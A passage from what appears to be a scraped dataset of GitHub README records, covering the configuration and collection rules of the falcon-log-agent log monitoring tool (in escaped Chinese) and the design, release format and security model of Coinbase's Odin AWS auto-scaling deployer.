\u57fa\u7840\u914d\u7f6e\u9879\n\u57fa\u7840\u914d\u7f6e\u9879\uff0c\u5373\u7a0b\u5e8f\u672c\u8eab\u7684\u914d\u7f6e\u9879\u3002\u9ed8\u8ba4\u662fcfg/cfg.json\uff0c\u53ef\u4ee5\u901a\u8fc7-c\u53c2\u6570\u6765\u6307\u5b9a\u3002\n\n**\u65e5\u5fd7\u76f8\u5173**\n```\nlog_path\uff1a\u7a0b\u5e8f\u8f93\u51fa\u7684\u65e5\u5fd7\u76ee\u5f55\nlog_level\uff1a\u65e5\u5fd7\u7b49\u7ea7\nlog_rotate_size\uff1a\u65e5\u5fd7\u5207\u5272\u5927\u5c0f\nlog_rotate_num\uff1a\u6309\u914d\u7f6e\u5207\u5272\u4e4b\u540e\uff0c\u4fdd\u7559\u591a\u5c11\u4e2a\u6587\u4ef6\uff0c\u5176\u4ed6\u7684\u6e05\u7406\u6389\n```\n\n**worker\u76f8\u5173**\n```\nworker_num\uff1a\u6bcf\u4e2a\u65e5\u5fd7\u6587\u4ef6\uff0c\u8fdb\u884c\u8ba1\u7b97\u7684\u5e76\u53d1\u6570\nqueue_size\uff1a\u8bfb\u6587\u4ef6\u548c\u8fdb\u884c\u8ba1\u7b97\u4e4b\u95f4\uff0c\u6709\u4e00\u4e2a\u7f13\u51b2\u961f\u5217\uff0c\u5982\u679c\u961f\u5217\u6ee1\u4e86\uff0c\u610f\u5473\u7740\u8ba1\u7b97\u80fd\u529b\u8ddf\u4e0d\u4e0a\uff0c\u5c31\u8981\u4e22\u65e5\u5fd7\u4e86\u3002\u8fd9\u4e2a\u914d\u7f6e\u5c31\u662f\u8fd9\u4e2a\u7f13\u51b2\u961f\u5217\u7684\u5927\u5c0f\u3002\npush_interval\uff1a\u5faa\u73af\u5224\u65ad\u5c06\u8ba1\u7b97\u5b8c\u6210\u7684\u6570\u636e\u63a8\u9001\u81f3\u53d1\u9001\u961f\u5217\u7684\u65f6\u95f4\npush_url\uff1a\u63a8\u9001\u7684odin-agent\u7684url\n```\n\n**\u8d44\u6e90\u9650\u5236**\n```\nmax_cpu_rate:\u6700\u5927\u4f7f\u7528\u7684cpu\u767e\u5206\u6bd4\u3002\uff08\u53ef\u7528\u6838\u6570=ceil(\u603b\u6838\u6570*max_cpu_rate))\nmax_mem_rate:\u6700\u5927\u4f7f\u7528\u5185\u5b58\u767e\u5206\u6bd4\u3002(\u6700\u5927\u5185\u5b58=(\u5185\u5b58\u603b\u5927\u5c0f*max_mem_rate)\uff0c\u6700\u5c0f\u4e3a500M)\n```\n\n**\u7b56\u7565\u76f8\u5173**\n```\nupdate_duration:\u7b56\u7565\u7684\u66f4\u65b0\u5468\u671f\ndefault_degree:\u9ed8\u8ba4\u7684\u91c7\u96c6\u7cbe\u5ea6\n```\n\n**\u5176\u4ed6**\n```\nhttp_port:\u81ea\u8eab\u72b6\u6001\u5bf9\u5916\u66b4\u9732\u7684\u63a5\u53e3\nendpoint:\u4e0a\u62a5\u81f3open-falcon\u7684endpoint\u914d\u7f6e\u3002(\u53ef\u9009host\u6216ip,host\u4e3a\u4e3b\u673a\u540d,ip\u4e3a\u672c\u673aip)\n```\n\n# \u91c7\u96c6\u7b56\u7565\n\n## \u6587\u4ef6\u8def\u5f84\n\n\u6587\u4ef6\u8def\u5f84\uff0c\u5373file_path\u914d\u7f6e\u9879\u3002**\u5fc5\u987b\u8981\u6c42\u542f\u52a8agent\u7684\u7528\u6237\uff0c\u5bf9\u8fd9\u4e2a\u6587\u4ef6\u6709\u53ef\u8bfb\u6743\u9650**\u3002\n\n\u6587\u4ef6\u8def\u5f84\u652f\u6301\u56fa\u5b9a\u8def\u5f84\u548c\u52a8\u6001\u8def\u5f84\u4e24\u79cd\uff1a\n- \u56fa\u5b9a\u8def\u5f84\uff1a\u76f4\u63a5\u586b\u5199\u5373\u53ef\uff0c\u5982/var/log/falcon-log-agent.log\n- \u52a8\u6001\u8def\u5f84\uff1a\u53ef\u652f\u6301\u6309\u7167\u89c4\u5219\u914d\u7f6e\u7684\u6839\u636e\u65f6\u95f4\u53d8\u5316\u7684\u8def\u5f84\u3002\u4f8b\u5982\uff1a\n\n```\n\u6bd4\u5982\uff1a\u7ebf\u4e0a\u6709\u4e9b\u6a21\u5757\u81ea\u5df1\u6309\u7167\u5c0f\u65f6\u5199\u5165\u6587\u4ef6\uff0c\u8def\u5f84\u4e3a\uff1a\n/xiaoju/application/log/20150723/application.log.2015072312\n \n\u5bf9\u5e94\u7684\u6211\u4eec\u7684\u914d\u7f6e\u65b9\u5f0f\u53ef\u4ee5\u586b\u5199\u4e3a\uff1a\n/xiaoju/application/log/${%Y%m%d}/application.log.${%Y%m%d%H} // ${}\u4e2d\u4e0d\u80fd\u5305\u542b/\n```\n\n## \u65f6\u95f4\u683c\u5f0f\n\n\u65f6\u95f4\u683c\u5f0f\uff0c\u5373time_format\u914d\u7f6e\u9879\u3002\n\n\u5982\u679c\u65e5\u5fd7\u4e2d\u6ca1\u6709\u65f6\u95f4\u683c\u5f0f\uff0c\u4e00\u65e6\u9047\u5230\u65e5\u5fd7\u5ef6\u8fdf\u843d\u76d8\u3001\u6216\u8005\u65e5\u5fd7\u91cf\u592a\u5927\u8ba1\u7b97\u5ef6\u8fdf\u7684\u60c5\u51b5\u3002\u4f1a\u76f4\u63a5\u5bfc\u81f4\u6211\u4eec\u7684\u76d1\u63a7\u91c7\u96c6\u4e0d\u51c6\u3002\n\n\u56e0\u6b64\uff0c\u6211\u4eec\u89c4\u5b9a\u65e5\u5fd7\u4e2d\u5fc5\u987b\u6709\u5408\u6cd5\u7684\u65f6\u95f4\u683c\u5f0f\u3002\u4e14\u5728\u914d\u7f6e\u4e2dtime_format\u9879\u6307\u5b9a\u3002\n\n\u5982\u679c\u60f3\u8981\u6dfb\u52a0\u81ea\u5df1\u7684\u65f6\u95f4\u683c\u5f0f\uff0c\u53ef\u4ee5\u76f4\u63a5\u5728[common/utils/util.go](https://github.com/didi/falcon-log-agent/blob/master/src/common/utils/util.go)\u91cc\u6dfb\u52a0\u3002\n\n\u76ee\u524d\u5df2\u7ecf\u652f\u6301\u7684\u65f6\u95f4\u683c\u5f0f\u5982\u4e0b\uff1a\n```\ndd/mmm/yyyy:HH:MM:SS\ndd/mmm/yyyy HH:MM:SS\nyyyy-mm-ddTHH:MM:SS\ndd-mmm-yyyy HH:MM:SS\nyyyy-mm-dd HH:MM:SS\nyyyy/mm/dd HH:MM:SS\nyyyymmdd HH:MM:SS\nmmm dd HH:MM:SS\n\nPS\uff1a\u4e3a\u4e86\u9632\u6b62\u65e5\u5fd7\u79ef\u538b\u6216\u6027\u80fd\u4e0d\u8db3\u5bfc\u81f4\u7684\u8ba1\u7b97\u504f\u5dee\uff0c\u65e5\u5fd7\u91c7\u96c6\u7684\u8ba1\u7b97\uff0c\u4f9d\u8d56\u4e8e\u65e5\u5fd7\u7684\u65f6\u95f4\u6233\u3002\n\u56e0\u6b64\u5982\u679c\u914d\u7f6e\u4e86\u9519\u8bef\u7684\u65f6\u95f4\u683c\u5f0f\uff0c\u5c06\u65e0\u6cd5\u5f97\u5230\u6b63\u786e\u7684\u7ed3\u679c\u3002\n```\n\n## \u91c7\u96c6\u89c4\u5219\n\n\u91c7\u96c6\u6b63\u5219\uff0c\u5305\u542b\u4e24\u4e2a\u914d\u7f6e\u9879\uff1apattern\u548cexclude\u3002\n\n\u4e24\u4e2a\u91c7\u96c6\u9879\u90fd\u662f\u6b63\u5219\u8868\u8fbe\u5f0f\uff0c\u6b63\u5219\u8868\u8fbe\u5f0f\u7684\u652f\u6301\u60c5\u51b5\u89c1\uff1a[google/re2](https://github.com/google/re2/wiki/Syntax)\n\npattern\u4ee3\u8868\u9700\u8981\u5b8c\u5168\u5339\u914d\u51fa\u6765\u7684\u8868\u8fbe\u5f0f\u3002\n\nexclude\u4ee3\u8868\u9700\u8981\u6392\u9664\u6389\u7684\u8868\u8fbe\u5f0f\u3002\n\n```\neg. \u4f8b\u5982\uff0c\u6211\u5e0c\u671b\u7edf\u8ba1code=500\u6216400\u7684\u65e5\u5fd7\u6570\u91cf\uff0c\u4f46\u662f\u60f3\u6392\u9664\u6389\u5173\u952e\u5b57SpeciallyErrorNo\u3002 \u914d\u7f6e\u5982\u4e0b\uff1a\n\npattern: code=[45]00\nexclude: SpeciallyErrorNo\n```\n\n## \u91c7\u96c6\u5468\u671f\n\n\u91c7\u96c6\u5468\u671f(step)\uff0c\u5bf9\u5e94\u7740\u76d1\u63a7\u7cfb\u7edf\u7684\u4e0a\u62a5\u5468\u671f\u3002\u610f\u5473\u7740\u591a\u4e45\u5408\u5e76\u4e0a\u62a5\u4e00\u6b21\u3002\n```\n\u5047\u8bbe\u6bcf\u79d2\u4ea7\u751f1\u6761\u7b26\u5408\u91c7\u96c6\u89c4\u5219\u7684\u65e5\u5fd7\uff0c\u914d\u7f6e\u7684\u91c7\u96c6\u65b9\u5f0f\u4e3a\u8ba1\u6570\u3002\n\u5982\u679cstep\u4e3a10 : \u5219\u6bcf10s\u4e0a\u62a5\u4e00\u6b21\uff0c\u503c\u4e3a10\n\u5982\u679cstep\u4e3a60 : \u5219\u6bcf60s\u4e0a\u62a5\u4e00\u6b21\uff0c\u503c\u4e3a60\n```\n\n## \u91c7\u96c6\u65b9\u5f0f\n\n\u91c7\u96c6\u65b9\u5f0f(func)\u7684\u610f\u601d\u662f\uff0c\u5f53\u6211\u4eec\u4ece\u65e5\u5fd7\u4e2d\u7b5b\u9009\u51fa\u4e00\u5806\u7b26\u5408\u89c4\u5219\u7684\u65e5\u5fd7\u4e4b\u540e\uff0c\u5e94\u8be5\u4ee5\u54ea\u79cd\u89c4\u5219\u6765\u8ba1\u7b97\u62ff\u5230\u6700\u540e\u7684\u503c\u6765\u4e0a\u62a5\u3002\n\n\u76ee\u524d\u652f\u6301\u7684\u91c7\u96c6\u65b9\u5f0f\u6709\uff1a\n- cnt\n- avg\n- sum\n- max\n- min\n\n\u4e3e\u4f8b\uff1a\n```\n\u5047\u8bbe\uff1a\n\u6b63\u5219\u8868\u8fbe\u5f0f\u914d\u7f6e\u4e3a Return Success : (\\d+)s Used\n \n\u67d0\u4e00\u4e2a\u5468\u671f\u5185\u65e5\u5fd7\u6eda\u52a8\uff1a\n2017/12/01 12:12:01 Return Success : 1s Used\n2017/12/01 12:12:02 Return Success : 2s Used\n2017/12/01 12:12:03 Return Success : 4s Used\n2017/12/01 12:12:04 Return Success : 2s Used\n2017/12/01 12:12:05 Return Success : 1s Used\n \n\u9996\u5148\uff0c\u6839\u636e\u6b63\u5219\u83b7\u53d6\u5230\u62ec\u53f7\u5185\u7684\u503c\uff1a1\u30012\u30014\u30012\u30011\n\u63a5\u4e0b\u6765\uff0c\u6839\u636e\u4e0d\u540c\u7684\u8ba1\u7b97\u65b9\u5f0f\uff0c\u4f1a\u5f97\u5230\u4e0d\u540c\u7684\u7ed3\u679c\uff1a\navg : (1 + 2 + 4 + 2 + 1) / 5 = 2\ncount : 5\nsum : (1 + 2 + 4 + 2 + 1) = 10\nmax : Max(1, 2, 4, 2, 1) = 4\nmin : Min(1, 2, 4, 2, 1) = 1\n```\n\n## \u91c7\u96c6\u540d\u79f0\n\n**\u91c7\u96c6\u540d\u79f0**(name)\u5bf9\u5e94open-falcon\u4e2d\u7684metric\uff0c\u5373\u76d1\u63a7\u9879\u3002\n\n## \u6807\u7b7e\n\n**\u6807\u7b7e**(tags)\u4e0eopen-falcon\u4e2d\u7684tags\u76f8\u5bf9\u5e94\u3002\u53ef\u4ee5\u7406\u89e3\u4e3a\u786e\u5b9a\u76d1\u63a7\u9879\u7684\u8865\u5145\u3002\n```\n\u8bf4\u660e\uff1a\u673a\u5668A\u7684\u7b2c\u4e00\u4e2a\u6838\u7684cpu\u7a7a\u95f2\u7387\u3002\n\n\u91c7\u96c6\u540d\u79f0(metric): cpu\u7a7a\u95f2\u7387(cpu.idle)\n\u6807\u7b7e(tags)\uff1a\u4e24\u4e2a\u6807\u7b7e: host=\u673a\u5668A;\u6838\u6570=\u7b2c\u4e00\u4e2a\u6838\n```\n\u5728\u4e3b\u6b63\u5219\u5339\u914d\u5b8c\u6210\u540e\uff0c\u7136\u540e\u5339\u914d\u51fatag\u7684\u503c\uff0c\u4e00\u8d77\u8fdb\u884c\u4e0a\u62a5\u3002\n\n\u82e5\u65e0\u6cd5\u5339\u914d\u51fatag\u7684\u503c\uff0c\u5219\u89c6\u4e3a\u8be5\u6761\u6570\u636e\u672a\u5339\u914d\u5230\uff0c\u8be5\u6761\u65e5\u5fd7\u5c06**\u4e0d\u518d\u8ba1\u5165\u7edf\u8ba1**\u3002\n\n## \u5176\u4ed6\n\n- degree: \u7cbe\u5ea6\n- comment: \u5907\u6ce8\n\n# \u68c0\u9a8c\u65e5\u5fd7\u683c\u5f0f\n\u542f\u52a8agent\uff0c\u4f1a\u81ea\u52a8\u52a0\u8f7d\u6240\u6709\u7b56\u7565\u3002\u6b64\u65f6\u901a\u8fc7**/check**\u63a5\u53e3\uff0c\u53ef\u4ee5\u5b9e\u65f6\u9a8c\u8bc1\u65e5\u5fd7\u662f\u5426\u53ef\u4ee5\u5339\u914d\u5230\u7b56\u7565\u3002\n/check\u63a5\u53e3\u4f1a\u5c06\u8be5\u6761\u65e5\u5fd7\u80fd\u547d\u4e2d\u7684\u91c7\u96c6\u89c4\u5219\uff0c\u4e00\u8d77\u8fd4\u56de\uff0c\u5e76\u8fd4\u56de\u547d\u4e2d\u8be6\u60c5\u3002\n```\n\u65b9\u6cd5\uff1aPOST\n\u53c2\u6570\uff1alog=${\u65e5\u5fd7\u539f\u6587} // postForm\n\neg.\ncurl -s -XPOST localhost:8003/check -d 'log=01/Jan/2018:12:12:12 service error 500, num=10 province=33' | python -m json.tool\n```\n\n\n# \u81ea\u8eab\u72b6\u6001\u66b4\u9732\nfalcon-log-agent\u672c\u8eab\u5bf9\u5916\u63d0\u4f9b\u4e86\u4e00\u4e2ahttp\u670d\u52a1\u7528\u6765\u66b4\u9732\u81ea\u8eab\u72b6\u6001\u3002\n\n\u4e3b\u8981\u63d0\u4f9b\u7684url\u5982\u4e0b\uff1a\n- /health \uff1a \u81ea\u8eab\u5b58\u6d3b\u72b6\u6001\n- /strategy \uff1a\u5f53\u524d\u751f\u6548\u7684\u7b56\u7565\u5217\u8868\n- /cached \uff1a \u6700\u8fd11min\u5185\u4e0a\u62a5\u7684\u70b9\n\n\n# \u81ea\u76d1\u63a7\n\u5728[common/proc/metric/metric.go](https://github.com/didi/falcon-log-agent/blob/master/common/proc/metric/metric.go#L38)\u5b9a\u4e49\u4e86\u4e00\u4e2a\u81ea\u76d1\u63a7\u7ed3\u6784\u4f53\u3002\n\n\u5728\u7a0b\u5e8f\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u4f1a\u4e0d\u65ad\u6536\u96c6\u4fe1\u606f\uff0c\u4e3b\u8981\u5305\u62ec\u5982\u4e0b\uff1a\n```\nMemUsedMB \u8fdb\u7a0b\u5185\u5b58\u5360\u7528\nReadLineCnt \u8bfb\u65e5\u5fd7\u884c\u6570\nDropLineCnt \u961f\u5217\u6253\u6ee1\u540e\uff0c\u6254\u6389\u7684\u65e5\u5fd7\u884c\u6570\nAnalysisCnt \u5206\u6790\u5b8c\u6210\u7684\u65e5\u5fd7\u884c\u6570\nAnalysisSuccCnt \u5206\u6790\u6210\u529f\u5339\u914d\u7684\u65e5\u5fd7\u884c\u6570\nPushCnt \u63a8\u9001\u7684\u76d1\u63a7\u6570\u636e\u70b9\u6570\nPushErrorCnt \u63a8\u9001\u9519\u8bef\u7684\u76d1\u63a7\u6570\u636e\u70b9\u6570\nPushLatency \u63a8\u9001\u76d1\u63a7\u6570\u636e\u5ef6\u8fdf\n```\n\u8fd9\u4e9b\u6570\u636e\uff0c\u76ee\u524d\u81ea\u76d1\u63a7\u7684\u5904\u7406\u65b9\u5f0f\u662f\uff1a\u5b9a\u65f6\u8f93\u51fa\u65e5\u5fd7\u3002\n\n\u5982\u679c\u9700\u8981\u5bf9\u63a5\u81ea\u5df1\u516c\u53f8\u7684\u76d1\u63a7\u7cfb\u7edf\uff0c\u5728[common/proc/metric/metric.go](https://github.com/didi/falcon-log-agent/blob/master/common/proc/metric/metric.go#L81)\u4fee\u6539HandleMetrics\u65b9\u6cd5\u5373\u53ef\u3002\n\n# \u8d21\u732e\u8005\n- [**\u9ad8\u5bb6\u5347**](https://github.com/GaoJiasheng)\n- [**\u5b89\u5b9d\u52c7**](https://github.com/anbaoyong)\n- [wcc526](https://github.com/wcc526)\n- [mdh67899](https://github.com/mdh67899)\n- [1Feng](https://github.com/1Feng)\n\n\n## Contributors\n\nThis project exists thanks to all the people who contribute. \n\n\n\n## Backers\n\nThank you to all our backers! \ud83d\ude4f [[Become a backer](https://opencollective.com/falcon-log-agent#backer)]\n\n\n\n\n## Sponsors\n\nSupport this project by becoming a sponsor. Your logo will show up here with a link to your website. [[Become a sponsor](https://opencollective.com/falcon-log-agent#sponsor)]\n\n\n\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "coinbase/odin", "link": "https://github.com/coinbase/odin", "tags": [], "stars": 536, "description": "Archived: Odin deployer to AWS for 12 Factor applications.", "lang": "Go", "repo_lang": "", "readme": "# Odin Auto-Scaling Group Deployer\n\n\"Odin\"\n\nDeploy your [12-factor-applications](https://12factor.net/) to AWS easily and securely with the Odin. Odin is a AWS [Step Function](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html) base on the [`step`](https://github.com/coinbase/step) framework that deploys services as [Auto-Scaling Groups](https://docs.aws.amazon.com/autoscaling/ec2/userguide/what-is-amazon-ec2-auto-scaling.html) (ASG's) to AWS.\n\nOdin's goals/requirements/features are:\n\n1. **Ephemeral Blue/Green**: create new instances, wait for them to become healthy, delete old instances; treating compute instances as disposable and ephemeral.\n1. **Declarative**: describe what a successful release looks like, not how to deploy it.\n1. **Scalable**: can scale both vertically (larger instances) and horizontally (more instances).\n1. **Secure**: resources are verified to ensure that they cannot be used accidentally or maliciously.\n1. **Gracefully Fail**: handle failures to recover and roll back with no/minimal impact to users.\n1. **Configuration Parity**: minimize divergence between production, staging and development environments by keeping releases as similar as possible.\n1. **No Configuration**: once Odin is deployed it requires no further configuration.\n1. **Multi Account**: one deployer for all AWS accounts.\n\n### Getting Started\n\nOdin is implemented as an [AWS Lambda Function](https://docs.aws.amazon.com/lambda/latest/dg/welcome.html) and [AWS Step Function](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html) that deploys by assuming a role into an AWS account. You can bootstrap these into AWS with:\n\n```bash\ngit pull # pull down new code\n./scripts/bootstrap\n```\n\n#### Testing with deploy-test\n\nOdin includes a test project `deploy-test` that has one service `web` that starts an nginx server to be mounted behind a [Elastic Load Balancer](https://aws.amazon.com/elasticloadbalancing/) (ELB) and [Application Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/introduction.html) target group. The service instances have a [security group](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html) and [instance profile](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html).\n\nTo create the AWS resources for `deploy-test`:\n\n```bash\n./scripts/geo apply resources/deploy-test-resources.rb\n```\n\n*Note: you will also have to tag the latest Ubuntu release with `Name: ubuntu` and `DeployWith: odin`*\n\nA `deploy-test` release file `deployer-test-release.json` looks like:\n\n```yaml\n{\n \"project_name\": \"coinbase/deploy-test\",\n \"config_name\": \"development\",\n \"subnets\": [\"test_private_subnet_a\", \"test_private_subnet_b\"],\n \"ami\": \"ubuntu\",\n \"services\": {\n \"web\": {\n \"instance_type\": \"t2.nano\",\n \"security_groups\": [\"ec2::coinbase/deploy-test::development\"],\n \"elbs\": [\"coinbase-deploy-test-web-elb\"],\n \"profile\": \"coinbase-deploy-test\",\n \"target_groups\": [\"coinbase-deploy-test-web-tg\"]\n }\n }\n}\n```\n\nThe user data for the release is from the file `deployer-test-release.json.userdata`:\n\n```yaml\n#cloud-config\nrepo_update: true\nrepo_upgrade: all\n\npackages:\n - docker.io\n\nruncmd:\n - docker run -d -p 8000:80 nginx\n```\n\nTo build a release for `deploy-test` and send it to Odin we use the `odin` executable:\n\n```bash\nodin deploy deploy-test-release.json\n```\n\n\"Odin\n\nThe `odin` executable takes the release file, merges in the user data, attaches some meta-data like `created_at` and `release_id, then send the release to the Odin step function that:\n\n1. validates the sent release and any referenced resources.\n1. creates a new auto-scaling group for `web` that starts an nginx server.\n1. waits for the EC2 instances in the `web` ASG to become healthy w.r.t. the ASG, the ELB and the target group. This may take a few minutes.\n1. Once healthy the ASGs from the previous release and terminate their instances.\n\nThis is the **ephemeral blue/green** where old instances are deleted and new servers created.\n\n### Odin Release\n\nAn Odin release is a request to deploy a **Project-Configuration** where:\n\n* A **Project** is a code-base typically named with `org/name`.\n* A **Configuration** is the environment the project is being deployed into, e.g. `development`, `production`.\n\nEach release can define 1-to-many **Services**; each service is a logical group of servers, e.g. `web` or `worker`, that maps to a single auto-scaling group (ASG).\n\nWhen Odin is sent a release, it moves it through a state machine:\n\n\"odin\n\n1. **Validate**: validate the release is correct.\n1. **Lock**: grabs a lock on project-configuration.\n1. **ValidateResources**: validate resources w.r.t. the project, configuration and service using them.\n1. **Deploy**: creates an ASG and other resource for each service.\n1. **CheckHealthy**: check to see if the new instances created are healthy w.r.t. their ASGs ELBs and target groups. If instances are seen to be terminating immediately halt release.\n1. **CleanUpSuccess**: if the release was a success, then delete the old ASGs.\n1. **CleanUpFailure**: if the release failed, delete the new ASGs.\n1. **ReleaseLockFailure**: try to release the lock and fail.\n\nAt each of these states it is possible to fail and then move towards a failure state. The typical failures are:\n\n* **BadReleaseError**: The release sent was invalid because either its structure was incorrect, its values were invalid, or its resources were invalid.\n* **LockExistsError**: Could not grab the lock because either another deploy for the project-configuration is currently going out, or a previous deploy left a lock in place.\n* **DeployError**: Unable to create a new ASG or resource.\n* **HaltError**: Halt was detected or instances were found terminating.\n* **TimeoutError**: The deploy took too long and failed.\n\nThe end states are:\n\n1. **Success**: the release went went as planned.\n2. **FailureClean**: release was unsuccessful, but cleanup was successful, so AWS was left in good state.\n3. **FailureDirty**: release was unsuccessful, but cleanup failed so AWS was left in a bad state. This should never happen and should alert if this happens, and file a bug.\n4. It is possible to not end in one of these states if the state machine is incorrect. **This is very bad**, alert if this happens and file a bug.\n\n#### Resources\n\nA release uses resources that must exist and be configured correctly to be used for the project-configuration-service being deployed.\n\nA release **must** have:\n\n1. an **AMI** defined with the `ami` key that can be either a `Name` tag or AMI ID e.g. `ami-1234567`\n2. **Subnets** defined with `subnets` key that is a list of either `Name` tags or Subnet IDs e.g. `subnet-1234567`\n\nBoth the above resources **MUST** have a tag `DeployWith` that equals `odin`.\n\nServices **can** have:\n\n1. **Security Groups** defined with `security_groups` key is a list of security groups `Name` tags\n2. **Elastic Load Balancers** defined with `elbs` key is a list of ELB names\n3. **Application Load Balancer Target Groups** defined with `target_groups` is a list of target group's `Name` tags\n\nAll the above resources **MUST** be tagged with the `ProjectName`, `ConfigName` and `ServiceName` of the release to ensure that resources are assigned correctly.\n\nServices can also have an **Instance Profile** defined by the `profile` key that is and instance profile `Name` tag. The roles path **MUST** be equal to `////`.\n\n#### Scale\n\nOdin makes it easy to scale both vertically and horizontally. To scale `deploy-test` we add to the release:\n\n```yaml\n{ ...\n \"services\": {\n \"web\": { ...\n \"instance_type\": \"c4.xlarge\",\n \"ebs_volume_size\": 20,\n \"ebs_volume_type\": \"gp2\",\n \"ebs_device_name\": \"/dev/sda1\",\n \"autoscaling\": {\n \"min_size\": 3,\n \"max_size\": 5,\n \"spread\": 0.2,\n \"max_terms\": 1,\n \"policies\": [\n {\n \"type\": \"cpu_scale_up\",\n \"threshold\" : 25,\n \"scaling_adjustment\": 2\n },\n {\n \"type\": \"cpu_scale_down\",\n \"threshold\" : 15,\n \"scaling_adjustment\": -1\n }\n ]\n }\n }\n }\n}\n```\n\n* `instance_type` is the [EC2 instance type](https://www.ec2instances.info/) for the service\n* `ebs_volume_size`, `ebs_volume_type`, `ebs_device_name` define the attached [EBS volume](https://aws.amazon.com/ebs/) in GB.\n\nThe `autoscaling` key defines the horizontal scaling of a service:\n\n* all calculations are bounded by `min_size` and `max_size`.\n* the `desired_capacity` is equal to the `min_size` or capacity of the previously launched service\n* the actual number of instances launched is the `desired_capacity * (1 + spread)`\n* to be deemed the healthy the service must have `desired_capacity * (1 - spread)`\n* if the number of terminating is greater than or equal to `max_terms` (default `0`), the release is immediately halts.\n* `policies` are defined above to increase the `desired_capacity` by 2 instances if the CPU goes above 25% and reduce by 1 instance if it drops below 15%.\n\n*Both `spread` and `max_terms` are useful when launching many instances because as scale increases the number of cloud errors increase.*\n\n#### User Data\n\n**Do not put sensitive data into user data**. User data is easily accessible from the AWS console, difficult to secure with IAM, and very [limited in size](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-add-user-data). Odin requires user data passed to it to be KMS encrypted, uploaded to S3, and a SHA256 be passed in the release to be checked. The userdata will still be accessible in plain text on a launch configuration and EC2 instances, so these precautions are more to protect tampering than secrets.\n\nFor any secret an instance needs access to, we recommend using [Vault](https://www.vaultproject.io/), [AWS Parameter store](https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-paramstore.html), or [KMS encrypted S3](https://docs.aws.amazon.com/kms/latest/developerguide/services-s3.html) authenticated by a service's instance profile.\n\nThe [user data](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html) is KMS encrypted and uploaded to S3. Odin will replace some strings with information about the release, project, config and service, e.g.:\n\n```yaml\n...\nwrite_files:\n - path: /\n content: |\n {{RELEASE_ID}}\n {{PROJECT_NAME}}\n {{CONFIG_NAME}}\n {{SERVICE_NAME}}\n```\n\nOdin will replace `{{PROJECT_NAME}}` with the name of the project and `{{SERVICE_NAME}}` with the name of the service. This can be useful for getting service specific configuration and logging.\n\nThe `odin` client will upload the user data for the services from the `.userdata` file, e.g. `deployer-test-release.json.userdata`.\n\n#### Timeout\n\nA release can have a `timeout` which is how long in seconds a release will wait for its services to become healthy. By default the timeout is 10 minutes, the max value would be around a year (*31556926 seconds*) since that is how long a step function can run.\n\n#### Lifecycle\n\nAWS provides [Auto Scaling Group Lifecycle Hooks](https://docs.aws.amazon.com/autoscaling/ec2/userguide/lifecycle-hooks.html) to detect and react to auto-scaling events. You can add the lifecycle hooks to the ASGs with:\n\n```yaml\n{ ...\n \"lifecycle\": {\n \"termhook\" : {\n \"transition\": \"autoscaling:EC2_INSTANCE_TERMINATING\",\n \"role\": \"asg_lifecycle_hooks\",\n \"sns\": \"asg_lifecycle_hooks\",\n \"heartbeat_timeout\": 300\n }\n }\n}\n```\n\nThese can be used to gracefully shutdown instances, which is necessary if a service has long running jobs e.g. a `worker` service.\n\n#### Halt\n\nOdin supports manually stopping a release while is it being deployed. Just execute:\n\n```\nodin halt deploy-test-release.json\n```\n\nThis will:\n\n1. Find the running deploy for the project configuration\n2. Write a `halt` file to S3\n3. Wait for Odin to detect the halt file and fail the deploy\n\nHalt does not guarantee that the release will not be deployed, if executed too late the release may still result in success.\n\n**DO NOT** use `Stop execution` of the Odin step function as it will not clean up resources and leave AWS in a bad state.\n\n### Security\n\nDeployers are critical pieces of infrastructure as they may be used to compromise software they deploy. As such, we take security very seriously around the `odin` and try to answer the following questions:\n\n1. *Authentication*: Who can deploy?\n2. *Authorization*: What can be deployed?\n3. *Replay* and *Man-in-the-middle (MITM)*: Can some unauthorized person edit or reuse a release to change what is deployed?\n4. *Audit*: Who has done what, and when?\n\n#### Authentication\n\nThe central authentication mechanisms are the AWS IAM permissions for step functions and S3.\n\nBy limiting the `ec2:CreateAutoscalingGroup`, permissions the Odin function becomes the only way to deploy ASG's. Then limiting permissions to who can call `states:StartExecution` for Odin limits who can deploy.\n\nEnsuring that Odin's lambda can only access a single S3 bucket, further limits who can deploy with:\n\n```yaml\n{\n \"Effect\": \"Allow\",\n \"Action\": [\n \"s3:GetObject*\", \"s3:PutObject*\",\n \"s3:List*\", \"s3:DeleteObject*\"\n ],\n \"Resource\": [\n \"arn:aws:s3:::#{s3_bucket_name}/*\",\n \"arn:aws:s3:::#{s3_bucket_name}\"\n ]\n},\n{\n \"Effect\": \"Deny\",\n \"Action\": [\"s3:*\"],\n \"NotResource\": [\n \"arn:aws:s3:::#{s3_bucket_name}/*\",\n \"arn:aws:s3:::#{s3_bucket_name}\"\n ]\n},\n```\n\nThe Odin step function also needs to decrypt the KMS encrypted user-data that is uploaded to S3. By default it is encrypted with the `alias/aws/s3` key, but a custom KMS key can be used and wither an alias or arn can be added to `user_data_kms_key`. A custom key will give a better audit trail, and can lock down who can release even more.\n\nWho can execute the step function, and who can upload to S3 are the two permissions that guard who can deploy.\n\n#### Authorization\n\nAll resources that can be used in a Odin deploy must opt-in using tags or paths. Additionally, service resources require specific tags or paths denoting which project/config/service can use them.\n\nAssets uploaded to S3 are in the path `//` so limiting who can `s3:PutObject` to a path can be used to limit what project-configs they can deploy or halt.\n\n#### Replay and MITM\n\nEach release the client generates a release `release_id`, a `created_at` date, and together also uploads the release to S3.\n\nThe `odin` will reject any request where the `created_at` date is not recent, or the release sent to the step function and S3 don't match. This means that if a user can invoke the step function, but not upload to S3 (or vice-versa) it is not possible to deploy old or malicious code.\n\n#### Audit\n\nWorking out what happened and when is very useful for debugging and security response. Step functions make it easy to see the history of all executions in the AWS console and via API. S3 can log all access to cloud-trail, so collecting from these two sources will show all information about a deploy.\n\n### Continuing 